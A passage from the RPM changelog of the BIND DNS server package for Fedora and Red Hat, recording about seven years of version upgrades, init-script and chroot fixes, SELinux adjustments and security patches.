cleanup\n[31:9.4.1-5]\n- very minor compatibility change in bind-chroot-admin (line 215)\n- enabled IDN support by default and don't distribute IDN libraries\n- specfile cleanup\n- add dynamic directory to /var/named. This directory will be primarily used for\n dynamic DNS zones. ENABLE_ZONE_WRITE and SELinux's named_write_master_zones no longer exist\n[31:9.4.1-4]\n- removed ldap-api patch and start using deprecated API\n- fixed minor problem in bind-chroot-admin script (#241103)\n[31:9.4.1-3]\n- fixed bind-chroot-admin dynamic DNS handling (#239149)\n- updated zone-freeze patch to latest upstream\n- ldap sdb has been rewriten to latest api (#239802)\n[31:9.4.1-2.fc7]\n- test build on new build system\n[31:9.4.1-1.fc7]\n- updated to 9.4.1 which contains fix to CVE-2007-2241\n[31:9.4.0-8.fc7]\n- improved 'zone freeze patch' - if multiple zone with same name exists\n no zone is freezed\n- minor cleanup in caching-nameserver's config file\n- fixed race-condition in dbus code (#235809)\n- added forgotten restorecon statement in bind-chroot-admin\n[31:9.4.0-7.fc7]\n- removed DEBUGINFO option because with this option (default) was bind\n builded with -O0 and without this flag no debuginfo package was produced.\n (I want faster bind => -O2 + debuginfo)\n- fixed zone finding (#236426)\n[31:9.4.0-6.fc7]\n- added idn support (still under development with upstream, disabled by default)\n[31:9.4.0-5.fc7]\n- dnssec-signzone utility now doesn't ignore -d parameter\n[31:9.4.0-4.fc7]\n- removed query-source[-v6] options from caching-nameserver config\n (#209954, increase security)\n- throw away idn. It won't be ready in fc7\n[31:9.4.0-3.fc7]\n- prepared bind to merge review\n- added experimental idn support to bind-utils utils (not enabled by default yet)\n- change chroot policy in caching-nameserver post section\n- fixed bug in bind-chroot-admin - rootdir function is called properly now\n[31:9.4.0-2.fc7]\n- added experimental SQLite support (written by John Boyd \n)\n- moved bind-chroot-admin script to chroot package\n- bind-9.3.2-redhat_doc.patch is always applied (#231738)\n[31:9.4.0-1.fc7]\n- updated to 9.4.0\n- bind-chroot-admin now sets EAs correctly (#213926)\n- throw away next_server_on_referral and no_servfail_stops patches (fixed in 9.4.0)\n[31:9.3.4-7.fc7]\n- minor cleanup in bind-chroot-admin script\n[31:9.3.4-6.fc7]\n- fixed broken bind-chroot-admin script (#227995)\n[31:9.3.4-5.fc7]\n- bind-chroot-admin now uses correct chroot path (#227600)\n[31:9.3.4-4.fc7]\n- fixed conflict between bind-sdb and ldap\n- removed duplicated bind directory in bind-libs\n[31:9.3.4-3.fc7]\n- fixed building without libbind\n- fixed post section (selinux commands is now in if-endif statement)\n- prever macro has been removed from version\n[31:9.3.4-2.fc7]\n- redirected output from bind-chroot prep and %preun stages to /dev/null\n[31:9.3.4-1.fc7]\n- updated to version 9.3.4 which contains security bugfixes\n[31:9.3.3-5.fc7]\n- package bind-libbind-devel has been marked as obsolete\n[31:9.3.3-4.fc7]\n- package bind-libbind-devel has beed removed (libs has been moved to bind-devel & bind-libs)\n- Resolves: #214208\n[31:9.3.3-3]\n- fixed a multi-lib issue\n- Resolves: rhbz#222717\n[31:9.3.3-2]\n- added namedGetForwarders written in shell (#176100),\n created by Baris Cicek \n.\n[31:9.3.3-1]\n- update to 9.3.3 final\n- fix for #219069: file included twice in src.rpm\n[31:9.3.3-0.1.rc3]\n- added back an interval to restart\n- renamed package, it should meet the N-V-R criteria\n- fix for #216185: bind-chroot-admin able to change root mode 750\n- added fix from #215997: incorrect permissions on dnszone.schema\n- added a notice to init script when /etc/named.conf doesn't exist (#216075)\n[30:9.3.3-6]\n- fix for #200465: named-checkzone and co. cannot be run as non-root user\n- fix for #212348: chroot'd named causes df permission denied error\n- fix for #211249, #211083 - problems with stopping named\n- fix for #212549: init script does not unmount /proc filesystem\n- fix for #211282: EDNS is globally enabled, crashing CheckPoint FW-1,\n added edns-enable options to named configuration file which can suppress\n EDNS in queries to DNS servers (see /usr/share/doc/bind-9.3.3/misc/options)\n- fix for #212961: bind-chroot doesn't clean up its mess on %preun\n- update to 9.3.3rc3, removed already merged patches\n[30:9.3.3-5]\n- fix for #209359: bind-libs from compatlayer CD will not\n install on ia64\n[30:9.3.3-4]\n- added fix for #210096: warning: group named does not exist - using root\n[30:9.3.3-3]\n- added fix from #209400 - Bind Init Script does not create\n the PID file always, created by Jeff Means\n- added timeout to stop section of init script.\n The default is 100 sec. and can be adjusted by NAMED_SHUTDOWN_TIMEOUT\n shell variable.\n[30:9.3.3-2]\n- removed chcon from %post script, replaced by restorecon\n (Bug 202547, comment no. 37)\n[30:9.3.3-1]\n- updated to the latest upstream (9.3.3rc2)\n[30:9.3.2-41]\n- added upstream patch for correct SIG handling - CVE-2006-4095\n[30:9.3.2-40]\n- suppressed messages from bind-chroot-admin\n- cleared notes about bind-config\n[30:9.3.2-39]\n- added fix for #203522 - 'bind-chroot-admin -e' command fails\n[30:9.3.2-38]\n- fix for #203194 - tmpfile usage\n[30:9.3.2-37]\n- fix for #202542 - /usr/sbin/bind-chroot-admin: No such file or directory\n- fix for #202547 - file_contexts: invalid context\n[30:9.3.2-36]\n- added Provides: bind-config\n[30:9.3.2-35]\n- fix bug 197493: renaming subpackage bind-config to caching-nameserver\n[30:9.3.2-34]\n- fix bug 199876: make '%exclude libbbind.*' conditional on %{LIBBIND}\n[30:9.3.2-33]\n- fix #195881, perms are not packaged correctly\n[30:9.3.2-32]\n- fix addenda to bug 189789:\n determination of selinux enabled was still not 100% correct in bind-chroot-admin\n- fix addenda to bug 196398:\n make named.init test for NetworkManager being enabled AFTER testing for -D absence;\n named.init now supports a 'DISABLE_NAMED_DBUS' /etc/sysconfig/named setting to disable\n auto-enable of named dbus support if NetworkManager enabled.\n[30:9.3.2-30]\n- fix bug 196398 - Enable -D option automatically in initscript\n if NetworkManager enabled in any runlevel.\n- fix namedGetForwarders for new dbus\n- fix bug 195881 - libbind.so should be owned by bind-libbind-devel\n[30:9.3.2-28.FC6]\n- Rebuild against new dbus\n[30:9.3.2-27.FC6]\n- rebuild with fixed glibc-kernheaders\n[30:9.3.2-26.FC6.1]\n- rebuild\n[30:9.3.2-26.FC6]\n- fix bugs 191093, 189789\n- backport selected fixes from upstream bind9 'v9_3_3b1' CVS version:\n ( see http://www.isc.org/sw/bind9.3.php 'Fixes' ):\n o change 2024 / bug 16027:\n named emitted spurious 'zone serial unchanged' messages on reload\n o change 2013 / bug 15941:\n handle unexpected TSIGs on unsigned AXFR/IXFR responses more gracefully\n o change 2009 / bug 15808: coverity fixes\n o change 1997 / bug 15818:\n named was failing to replace negative cache entries when a positive one\n for the type was learnt\n o change 1994 / bug 15694: OpenSSL 0.9.8 support\n o change 1991 / bug 15813:\n The configuration data, once read, should be treated as readonly.\n o misc. validator fixes\n o misc. resolver fixes\n o misc. dns fixes\n o misc. isc fixes\n o misc. libbind fixes\n o misc. isccfg fix\n o misc. lwres fix\n o misc. named fixes\n o misc. dig fixes\n o misc. nsupdate fix\n o misc. tests fixes\n[30:9.3.2-24.FC6]\n- and actually put the devel symlinks in the right subpackage\n[30:9.3.2-23.FC6]\n- rebuild for -devel deps\n[30:9.3.2-22]\n- apply upstream patch for ncache_adderesult segfault bug 173961 addenda\n- fix bug 188382: rpm --verify permissions inconsistencies\n- fix bug 189186: use /sbin/service instead of initscript\n- rebuild for new gcc, glibc-kernheaders\n[30:9.3.2-20]\n- fix resolver.c ncache_adderesult segfault reported in addenda to bug 173961\n (upstream bugs #15642, #15528 ?)\n- allow named ability to generate core dumps after setuid (upstream bug #15753)\n[30:9.3.2-18]\n- fix bug 187529: make bind-chroot-admin deal with subdirectories properly\n[30:9.3.2-16]\n- fix bug 187286:\n prevent host(1) printing duplicate 'is an alias for' messages\n for the default AAAA and MX lookups as well as for the A lookup\n (it now uses the CNAME returned for the A lookup for the AAAA and MX lookups).\n This is upstream bug #15702 fixed in the unreleased bind-9.3.3\n- fix bug 187333: fix SOURCE24 and SOURCE25 transposition\n[30:9.3.2-14]\n- fix bug 186577: remove -L/usr/lib from libbind.pc and more .spec file cleanup\n- add '%doc' sample configuration files in /usr/share/doc/bind*/sample\n- rebuild with new gcc and glibc\n[30:9.3.2-12]\n- fix typo in initscript\n- fix Requires(post): policycoreutils in sub-packages\n[30.9.3.2-10]\n- fix bug 185969: more .spec file cleanup\n[30.9.3.2-8]\n- Do not allow package to be installed if named:25 userid creation fails\n- Give libbind a pkg-config file\n- remove restorecon from bind-chroot-admin (not required).\n- fix named.caching-nameserver.conf (listen-on-v6 port 53 { ::1 };)\n[30:9.3.2-7]\n- fix issues with bind-chroot-admin\n[30:9.3.2-6]\n- replace caching-nameserver with bind-config sub-package\n- fix bug 177595: handle case where is a link in initscript\n- fix bug 177001: bind-config creates symlinks OK now\n- fix bug 176388: named.conf is now never replaced by any RPM\n- fix bug 176248: remove unecessary creation of rpmsave links\n- fix bug 174925: no replacement of named.conf\n- fix bug 173963: existing named.conf never modified\n- major .spec file cleanup\n[30:9.3.2-4.1]\n- bump again for double-long bug on ppc(64)\n[30:9.3.2-4]\n- regenerate redhat_doc patch for non-DBUS builds\n- allow dbus builds to work with dbus version < 0.6 (bz #179816)\n[30:9.3.2-3]\n- try supporting without dbus support\n[30:9.3.2-2.1]\n- Rebuild for new gcc, glibc, glibc-kernheaders\n[30:9.3.2-2]\n- fix bug 177854: temporary fix for broken kernel-2.6.15-1854+\n /proc/net/if_inet6 format\n[30:9.3.2-1]\n- Upgrade to 9.3.2, released today\n[28:9.3.2rc1-2]\n- fix bug 176100: do not Require: perl just for namedGetForwarders !\n* Fri Dec 09 2005 Jesse Keating \n- rebuilt\n[28:9.3.2rc-1]\n- Upgrade to upstream version 9.3.2rc1\n- fix namedSetForwarders -> namedGetForwarders SOURCE14 typo\n[24:9.3.1-26]\n- rebuild for new dbus 0.6 dependency; remove use of\n DBUS_NAME_FLAG_PROHIBIT_REPLACEMENT\n[24:9.3.1-24]\n- allow D-BUS support to work in bind-chroot environment:\n workaround latest selinux policy by mounting /var/run/dbus/\n under chroot instead of /var/run/dbus/system-bus-socket\n[24:9.3.1-22]\n- fix bug 172632 - remove .la files\n- ship namedGetForwarders and namedSetForwarders scripts\n- fix detection of -D option in chroot\n[24:9.3.1-21]\n- rebuilt with new openssl\n[24.9.3.1-20]\n- Allow the -D enable D-BUS option to be used within bind-chroot .\n- fix bug 171226: supply some documentation for pgsql SDB .\n[24:9.3.1-18]\n- fix bug 169969: do NOT call dbus_svc_dispatch() in dbus_mgr_init_dbus() -\n task->state != task_ready and will cause Abort in task.c if process\n is waiting for NameOwnerChanged to do a SetForwarders\n[24:9.3.1-16]\n- Fix reconnecting to dbus-daemon after it stops & restarts .\n[24:9.3.1-14]\n- When forwarder nameservers are changed with D-BUS, flush the cache.\n[24:9.3.1-12]\n- fix bug 168302: use %{__cc} for compiling dns-keygen\n- fix bug 167682: bind-chroot directory permissions\n- fix issues with -D dbus option when dbus service not running or disabled\n[24:9.3.1-12]\n- fix bug 167062: named should be started after syslogd by default\n[24:9.3.1-11]\n- fix bug 166227: host: don't do default AAAA and MX lookups with '-t a' option\n[24:9.3.1-10]\n- Build with D-BUS patch by default; D-BUS support enabled with named -D option\n- Enable D-BUS for named_sdb also\n- fix sdb pgsql's zonetodb.c: must use isc_hash_create() before dns_db_create()\n- update fix for bug 160914 : test for RD=1 and ARCOUNT=0 also before trying next server\n- fix named.init script to handle named_sdb properly\n- fix named.init script checkconfig() to handle named '-c' option\n and make configtest, test, check configcheck synonyms\n[24:9.3.1-8]\n- fix named.init script bugs 163598, 163409, 151852(addendum)\n[24:9.3.1-7]\n- fix bug 160914: resolver utilities should try next server on empty referral\n (now that glibc bug 162625 is fixed)\n host and nslookup now by default try next server on SERVFAIL\n (host now has '-s' option to disable, and nslookup given\n '[no]fail' option similar to dig's [no]fail option).\n- rebuild and re-test with new glibc & gcc (all tests passed).\n[24:9.3.1-6]\n- fix bug 157950: dig / host / nslookup should reject invalid resolv.conf\n files and not use uninitialized garbage nameserver values\n (ISC bug 14841 raised).\n[24:9.3.1-4_FC4]\n- Fix SDB LDAP\n[24:9.3.1-4]\n- Fix bug 157601: give named.init a configtest function\n- Fix bug 156797: named.init should check SELinux booleans.local before booleans\n- Fix bug 154335: if no controls in named.conf, stop named with -TERM sig, not rndc\n- Fix bug 155848: add NOTES section to named.8 man-page with info on all Red Hat\n BIND quirks and SELinux DDNS / slave zone file configuration\n- D-BUS patches NOT applied until dhcdbd is in FC\n[24:9.3.1-4_dbus]\n- Enhancement to allow dynamic forwarder table management and\n- DHCP forwarder auto-configuration with D-BUS\n[24:9.3.1-2_FC4]\n- Rebuild for bind-sdb libpq.so.3 dependency\n- fix bug 150981: don't install libbind man-pages if no libbind\n- fix bug 151852: mount proc on /proc to allow sysconf(...)\n to work and correct number of CPUs to be determined\n[24:9.3.1-1_FC4]\n- Upgrade to ISC BIND 9.3.1 (final release) released today.\n[22.9.3.1rc1-5]\n- fix bug 150288: h_errno not being accessed / set correctly in libbind\n- add libbind man-pages from bind-8.4.6\n[22:9.3.1rc1-4]\n- Rebuild with gcc4 / glibc-2.3.4-14.\n[22:9.3.1rc1-3]\n- configure with --with-pic to get PIC libraries\n[22:9.3.1rc1-2]\n- fix bug 149183: don't use getifaddrs() .\n[22:9.3.1rc1-1]\n- Upgrade to 9.3.1rc1\n- Add Simplified Database Backend (SDB) sub-package ( bind-sdb )\n- add named_sdb - ldap + pgsql + dir database backend support with\n- 'ENABLE_SDB' named.sysconfig option\n- Add BIND resolver library & includes sub-package ( libbind-devel)\n- fix bug 147824 / 147073 / 145664: ENABLE_ZONE_WRITE in named.init\n- fix bug 146084 : shutup restorecon\n[22:9.3.0-2]\n- Fix bug 143438: named.init will now make correct ownership of /var/named\n- based on 'named_write_master_zones' SELinux boolean.\n- Fix bug 143744: dig & nsupdate IPv6 timeout (dup of 140528)\n[9.3.0-1]\n- Upgrade BIND to 9.3.0 in Rawhide / FC4 (bugs 134529, 133654...)\n[20:9.2.4-4]\n- Fix bugs 140528 and 141113:\n- 2 second timeouts when IPv6 not configured and root nameserver's\n- AAAA addresses are queried\n[20:9.2.4-2]\n- Fix bug 136243: bind-chroot %post must run restorecon -R /var/named/chroot\n- Fix bug 135175: named.init must return non-zero if named is not run\n- Fix bug 134060: bind-chroot %post must use mktemp, not /tmp/named\n- Fix bug 133423: bind-chroot %files entries should have been %dirs\n[20:9.2.4-1]\n- BIND 9.2.4 (final release) released - source code actually\n- identical to 9.2.4rc8, with only version number change.\n[10:9.2.4rc8-14]\n- Upgrade to upstream bind-9.2.4rc8 .\n- Progress: Finally! Hooray! ISC bind now distributes:\n- o named.conf(5) and nslookup(8) manpages\n- 'bind-manpages.bz2' source can now disappear\n- (could this have something to do with ISC bug I raised about this?)\n- o 'deprecation_msg' global has vanished\n- bind-9.2.3rc3-deprecation_msg_shut_up.diff.bz2 can disappear\n[10:9.2.4rc8-14]\n- Fix bug 106572/132385: copy /etc/localtime to chroot on start\n[10:9.2.4rc7-12_EL3]\n- Fix bug 132303: if ROOTDIR line was replaced after upgrade from\n- bind-chroot-9.2.2-21, restart named\n[10:9.2.4rc7-11_EL3]\n- Fix bug 131803: replace ROOTDIR line removed by broken\n- bind-chroot 9.2.2-21's '%postun'; added %triggerpostun for bind-chroot\n[10:9.2.4rc7-10_EL3]\n- Fix bugs 130121 & 130981 for RHEL-3\n[10:9.2.4rc7-10]\n- Fix bug 130121: add '%ghost' entries for files included in previous\n- bind-chroot & not in current - ie. named.conf, rndc.key, dev/* -\n- that RPM removed after upgrade .\n* Thu Aug 26 2004 Jason Vas Dias \n- Fix bug 130981: add '-t' option to named-checkconf invocation in\n- named.init if chroot installed.\n* Wed Aug 25 2004 Jason Vas Dias \n- Remove resolver(5) manpage now in man-pages (bug 130792);\n- Don't create /dev/ entries in bind-chroot if already there (bug 127556);\n- fix bind-devel Requires (bug 130919)\n- Set default location for dumpdb & stats files to /var/named/data\n* Tue Aug 24 2004 Jason Vas Dias \n- Fix devel Requires for bug 130738 & fix version\n* Tue Aug 24 2004 Jason Vas Dias \n- Fix errors on clean install if named group does not exist\n- (bug 130777)\n* Thu Aug 19 2004 Jason Vas Dias \n- Upgrade to bind-9.2.4rc7; applied initscript fix\n- for bug 102035.\n* Mon Aug 09 2004 Jason Vas Dias \n- Fixed bug 129289: bind-chroot install / deinstall\n- on install, existing config files 'safe_replace'd\n- with links to chroot copies; on uninstall, moved back.\n* Fri Aug 06 2004 Jason Vas Dias \n- Fixed bug 129258: '/var/tmp' typo in spec\n* Wed Jul 28 2004 Jason Vas Dias \n- Fixed bug 127124 : 'Requires: kernel >= 2.4'\n- causes problems with Linux VServers\n* Tue Jul 27 2004 Jason Vas Dias \n- Fixed bug 127555 : chroot tar missing var/named/slaves\n* Fri Jul 16 2004 Jason Vas Dias \n- Upgraded to ISC version 9.2.4rc6\n* Fri Jul 16 2004 Jason Vas Dias \n- Fixed named.init generation of error messages on\n- 'service named stop' and 'service named reload'\n- as per bug 127775\n[9.2.3-19]\n- Bump for rhel 3.0 U3\n[9.2.3-18]\n- remove disable-linux-caps\n[9.2.3-17]\n- Update RHEL3 to latest bind\n* Tue Jun 15 2004 Elliot Lee \n- rebuilt\n[9.2.3-15]\n- Remove device files from chroot, Named uses the system one\n[9.2.3-14]\n- Move RFC to devel package\n[9.2.3-13]\n- Fix location of restorecon\n[9.2.3-12]\n- Tighten security on config files. Should be owned by root\n[9.2.3-11]\n- Update key patch to include conf-keygen\n[9.2.3-10]\n- fix chroot to only happen once.\n- fix init script to do kill insteall of killall\n[9.2.3-9]\n- Add fix for SELinux security context\n* Tue Mar 02 2004 Elliot Lee \n- rebuilt\n* Sat Feb 28 2004 Florian La Roche \n- run ldconfig for libs subrpm\n* Mon Feb 23 2004 Tim Waugh \n- Use ':' instead of '.' as separator for chown.\n[9.2.3-7]\n- Add COPYRIGHT\n* Fri Feb 13 2004 Elliot Lee \n- rebuilt\n[9.2.3-5]\n- Add defattr to libs\n[9.2.3-4]\n- Break out library package\n[9.2.3-3]\n- Fix condrestart\n[9.2.3-2]\n- Move libisc and libdns to bind from bind-util\n[9.2.3-1]\n- Move to 9.2.3\n[9.2.2.P3-10]\n- Add PIE support\n[9.2.2.P3-9]\n- Add /var/named/slaves directory\n* Sun Oct 12 2003 Florian La Roche \n- do not link against libnsl, not needed for Linux\n[9.2.2.P3-6]\n- Fix local time in log file\n[9.2.2.P3-5]\n- Try again\n[9.2.2.P3-4]\n- Fix handling of chroot -/dev/random\n[9.2.2.P3-3]\n- Stop hammering stuff on update of chroot environment\n[9.2.2.P3-2]\n- Fix chroot directory to grab all subdirectories\n[9.2.2.P3-1]\n- New patch to support for 'delegation-only'\n[9.2.2-23]\n- patch support for 'delegation-only'\n[9.2.2-22]\n- Update to build on RHL\n[9.2.2-21]\n- Install libraries as exec so debug info will be pulled\n[9.2.2-20]\n- Remove BSDCOMPAT (BZ 99454)\n[9.2.2-19]\n- Update to build on RHL\n[9.2.2-18]\n- Change protections on /var/named and /var/chroot/named\n[9.2.2-17]\n- Update to build on RHL\n[9.2.2-16]\n- Update to build on RHEL\n* Wed Jun 04 2003 Elliot Lee \n- rebuilt\n[9.2.2-14]\n- Update to build on RHEL\n[9.2.2-13]\n- Fix config description of named.conf in chroot\n- Change named.init script to check for existence of /etc/sysconfig/network\n[9.2.2-12]\n- Update to build on RHEL\n[9.2.2-11]\n- Update to build on RHEL\n[9.2.2-10]\n- Fix echo OK on starting/stopping service\n[9.2.2-9]\n- Update to build on RHEL\n[9.2.2-8]\n- Fix echo on startup\n[9.2.2-7]\n- Fix problems with chroot environment\n- Eliminate posix threads\n[9.2.2-6]\n- Fix build problems\n[9.2.2-5]\n- Fix build on beehive\n[9.2.2-4]\n- build bind-chroot kit\n[9.2.2-3]\n- Change configure to use proper threads model\n[9.2.2-2]\n- update to 9.2.2\n[9.2.2-1]\n- update to 9.2.2\n[9.2.1-16]\n- Put a sleep in restart to make sure stop completes\n* Wed Jan 22 2003 Tim Powers \n- rebuilt\n[9.2.1-14]\n- Separate /etc/rndc.key to separate file\n[9.2.1-13]\n- Use openssl's pkgconfig data, if available, at build-time.\n[9.2.1-12]\n- Fix log rotate to use service named reload\n- Change service named reload to give success/failure message [73770]\n- Fix File checking [75710]\n- Begin change to automatically run in CHROOT environment\n[9.2.1-10]\n- Fix startup script to work like all others.\n[9.2.1-9]\n- Fix configure to build on x86_64 platforms\n* Wed Aug 07 2002 Karsten Hopp \n- fix #70583, doesn't build on IA64\n[9.2.1-8]\n- bind-utils shouldn't require bind\n[9.2.1-7]\n- fix name of pidfine in logrotate script (#68842)\n- fix owner of logfile in logrotate script (#41391)\n- fix nslookup and named.conf man pages (output on stderr)\n (#63553, #63560, #63561, #54889, #57457)\n- add rfc1912 (#50005)\n- gzip all rfc's\n- fix typo in keygen.c (#54870)\n- added missing manpages (#64065)\n- shutdown named properly with rndc stop (#62492)\n- /sbin/nologin instead of /bin/false (#68607)\n- move nsupdate to bind-utils (where the manpage already was) (#66209, #66381)\n- don't kill initscript when rndc fails (reload) (#58750)\n[9.2.1-5]\n- Fix #65975\n* Fri Jun 21 2002 Tim Powers \n- automated rebuild\n* Thu May 23 2002 Tim Powers \n- automated rebuild\n[9.2.1-2]\n- Move libisccc, lib isccfg and liblwres from bind-utils to bind,\n they're not required if you aren't running a nameserver.\n* Fri May 03 2002 Florian La Roche \n- update to 9.2.1 release\n[9.2.0-8]\n- Merge 30+ bug fixes from 9.2.1rc1 code\n[9.2.0-7]\n- Don't exit if /etc/named.conf doesn't exist if we're running\n chroot (#60868)\n- Revert Elliot's changes, we do require specific glibc/glibc-kernheaders\n versions or bug #58335 will be back. 'It compiles, therefore it works'\n isn't always true.\n[9.2.0-6]\n- Fix BuildRequires (we don't need specific glibc/glibc-kernheaders\nversions).\n- Use _smp_mflags\n[9.2.0-4]\n- rebuild, require recent autoconf, automake (#58335)\n* Fri Jan 25 2002 Tim Powers \n- rebuild against new libssl\n* Wed Jan 09 2002 Tim Powers \n- automated rebuild\n[9.2.0-1]\n- 9.2.0\n[9.2.0-0.rc10.2]\n- 9.2.0rc10\n[9.2.0-0.rc8.2]\n- Fix up rndc.conf (#55574)\n[9.2.0-0.rc8.1]\n- rc8\n- Enforce --enable-threads\n[9.2.0-0.rc7.1]\n- 9.2.0rc7\n- Use rndc status for 'service named status', it's supposed to actually\n work in 9.2.x.\n[9.2.0-0.rc5.1]\n- 9.2.0rc5\n- Fix rpm --rebuild with ancient libtool versions (#53938, #54257)\n[9.2.0-0.rc4.1]\n- 9.2.0rc4\n[9.2.0-0.rc3.1]\n- 9.2.0rc3\n- remove ttl patch, I don't think we need this for 8.0.\n- remove dig.1.bz2 from the bind8-manpages tar file, 9.2 has a new dig man page\n- add lwres* man pages to -devel\n[9.1.3-4]\n- Make sure /etc/rndc.conf isn't world-readable even after the\n %post script inserted a random key (#53009)\n[9.1.3-3]\n- Add build dependencies (#49368)\n- Make sure running service named start several times doesn't create\n useless processes (#47596)\n- Work around the named parent process returning 0 even if the config\n file is broken (it's parsed later by the child processes) (#45484)\n[9.1.3-2]\n- Don't use rndc status, it's not yet implemented (#48839)\n* Sun Jul 08 2001 Florian La Roche \n- update to 9.1.3 release\n[9.1.3-0.rc3.1]\n- Fix up rndc configuration and improve security (#46586)\n[9.1.3-0.rc2.2]\n- Sync with caching-nameserver-7.1-6\n[9.1.3-0.rc2.1]\n- Update to rc2\n[9.1.3-0.rc1.3]\n- Remove resolv.conf(5) man page, it's now in man-pages\n[9.1.3-0.rc1.2]\n- Add named.conf man page from bind 8.x (outdated, but better than nothing,\n - Rename the rndc key (#42895)\n- Add dnssec* man pages\n[9.1.3-0.rc1.1]\n- 9.1.3rc1\n- s/Copyright/License/\n[9.1.2-1]\n- 9.1.2 final. No changes between 9.1.2-0.rc1.1 and this one, except for\n the version number, though.\n[9.1.2-0.rc1.1]\n- 9.1.2rc1\n[9.1.1-1]\n- 9.1.1\n[9.1.0-10]\n- Merge fixes from 9.1.1rc5\n[9.1.0-9]\n- Work around bind 8 -> bind 9 migration problem when using buggy zone files:\n accept zones without a TTL, but spew out a big fat warning. (#31393)\n* Thu Mar 08 2001 Bernhard Rosenkraenzer \n- Add fixes from rc4\n* Fri Mar 02 2001 Nalin Dahyabhai \n- rebuild in new environment\n* Thu Mar 01 2001 Bernhard Rosenkraenzer \n- killall -HUP named if rndc reload fails (#30113)\n* Tue Feb 27 2001 Bernhard Rosenkraenzer \n- Merge some fixes from 9.1.1rc3\n* Tue Feb 20 2001 Bernhard Rosenkraenzer \n- Don't use the standard rndc key from the documentation, instead, create a random one\n at installation time (#26358)\n- Make /etc/rndc.conf readable by user named only, it contains secret keys\n* Tue Feb 20 2001 Bernhard Rosenkraenzer \n- 9.1.1 probably won't be out in time, revert to 9.1.0 and apply fixes\n from 9.1.1rc2\n- bind requires bind-utils (#28317)\n* Tue Feb 13 2001 Bernhard Rosenkraenzer \n- Update to rc2, fixes 2 more bugs\n- Fix build with glibc >= 2.2.1-7\n* Thu Feb 08 2001 Bernhard Rosenkraenzer \n- Update to 9.1.1rc1; fixes 17 bugs (14 of them affecting us;\n 1 was fixed in a Red Hat patch already, 2 others are portability\n improvements)\n* Wed Feb 07 2001 Bernhard Rosenkraenzer \n- Remove initscripts 5.54 requirement (#26489)\n* Mon Jan 29 2001 Bernhard Rosenkraenzer \n- Add named-checkconf, named-checkzone (#25170)\n* Mon Jan 29 2001 Trond Eivind Glomsrod \n- use echo, not gprintf\n* Wed Jan 24 2001 Bernhard Rosenkraenzer \n- Fix problems with \n Patch from Daniel Roesen \n Bug #24890\n* Thu Jan 18 2001 Bernhard Rosenkraenzer \n- 9.1.0 final\n* Sat Jan 13 2001 Bernhard Rosenkraenzer \n- 9.1.0rc1\n- i18nify init script\n- bzip2 source to save space\n* Thu Jan 11 2001 Bernhard Rosenkraenzer \n- Fix %postun script\n* Tue Jan 09 2001 Bernhard Rosenkraenzer \n- 9.1.0b3\n* Mon Jan 08 2001 Bernhard Rosenkraenzer \n- Add named.conf man page from bind8 (#23503)\n* Sun Jan 07 2001 Bernhard Rosenkraenzer \n- Make /etc/rndc.conf and /etc/sysconfig/named noreplace\n- Make devel require bind = %{version} rather than just bind\n* Sun Jan 07 2001 Bernhard Rosenkraenzer \n- Fix init script for real\n* Sat Jan 06 2001 Bernhard Rosenkraenzer \n- Fix init script when ROOTDIR is not set\n* Thu Jan 04 2001 Bernhard Rosenkraenzer \n- Add hooks for setting up named to run chroot (RFE #23246)\n- Fix up requirements\n* Fri Dec 29 2000 Bernhard Rosenkraenzer \n- 9.1.0b2\n* Wed Dec 20 2000 Bernhard Rosenkraenzer \n- Move run files to /var/run/named/ - /var/run isn't writable\n by the user we're running as. (Bug #20665)\n* Tue Dec 19 2000 Bernhard Rosenkraenzer \n- Fix reverse lookups (#22272)\n- Run ldconfig in %post utils\n* Tue Dec 12 2000 Karsten Hopp \n- fixed logrotate script (wrong path to kill)\n- include header files in -devel package\n- bugzilla #22049, #19147, 21606\n* Fri Dec 08 2000 Bernhard Rosenkraenzer \n- 9.1.0b1 (9.1.0 is in our timeframe and less buggy)\n* Mon Nov 13 2000 Bernhard Rosenkraenzer \n- 9.0.1\n* Mon Oct 30 2000 Bernhard Rosenkraenzer \n- Fix initscript (Bug #19956)\n- Add sample rndc.conf (Bug #19956)\n- Fix build with tar 1.13.18\n* Tue Oct 10 2000 Bernhard Rosenkraenzer \n- Add some missing man pages (taken from bind8) (Bug #18794)\n* Sun Sep 17 2000 Bernhard Rosenkraenzer \n- 9.0.0 final\n* Wed Aug 30 2000 Bernhard Rosenkraenzer \n- rc5\n- fix up nslookup\n* Thu Aug 24 2000 Bernhard Rosenkraenzer \n- rc4\n* Thu Jul 13 2000 Bernhard Rosenkraenzer \n- 9.0.0rc1\n* Wed Jul 12 2000 Prospector \n- automatic rebuild\n* Sun Jul 09 2000 Florian La Roche \n- add 'exit 0' for uninstall case\n* Fri Jul 07 2000 Florian La Roche \n- add prereq init.d and cleanup install section\n* Fri Jun 30 2000 Trond Eivind Glomsrod \n- fix the init script\n* Wed Jun 28 2000 Nalin Dahyabhai \n- make libbind.a and nslookup.help readable again by setting INSTALL_LIB to ''\n* Mon Jun 26 2000 Bernhard Rosenkranzer \n- Fix up the initscript (Bug #13033)\n- Fix build with current glibc (Bug #12755)\n- /etc/rc.d/init.d -> /etc/init.d\n- use %{_mandir} rather than /usr/share/man\n* Mon Jun 19 2000 Bill Nottingham \n- fix conflict with man-pages\n- remove compatibilty chkconfig links\n- initscript munging\n* Wed Jun 14 2000 Nalin Dahyabhai \n- modify logrotate setup to use PID file\n- temporarily disable optimization by unsetting at build-time\n- actually bump the release this time\n* Sun Jun 04 2000 Bernhard Rosenkraenzer \n- FHS compliance\n* Mon Apr 17 2000 Nalin Dahyabhai \n- clean up restart patch\n* Mon Apr 10 2000 Nalin Dahyabhai \n- provide /var/named (fix for bugs #9847, #10205)\n- preserve args when restarted via ndc(8) (bug #10227)\n- make resolv.conf(5) a link to resolver(5) (bug #10245)\n- fix SYSTYPE bug in all makefiles\n- move creation of named user from %post into %pre\n* Mon Feb 28 2000 Bernhard Rosenkranzer \n- Fix TTL (patch from ISC, Bug #9820)\n* Wed Feb 16 2000 Bernhard Rosenkranzer \n- fix typo in spec (it's %post, without a leading blank) introduced in -6\n- change SYSTYPE to linux\n* Fri Feb 11 2000 Bill Nottingham \n- pick a standard < 100 uid/gid for named\n* Fri Feb 04 2000 Elliot Lee \n- Pass named a '-u named' parameter by default, and add/remove user.\n* Thu Feb 03 2000 Bernhard Rosenkraenzer \n- fix host mx bug (Bug #9021)\n* Mon Jan 31 2000 Cristian Gafton \n- rebuild to fix dependencies\n- man pages are compressed\n* Wed Jan 19 2000 Bernhard Rosenkraenzer \n- It's /usr/bin/killall, not /usr/sbin/killall (Bug 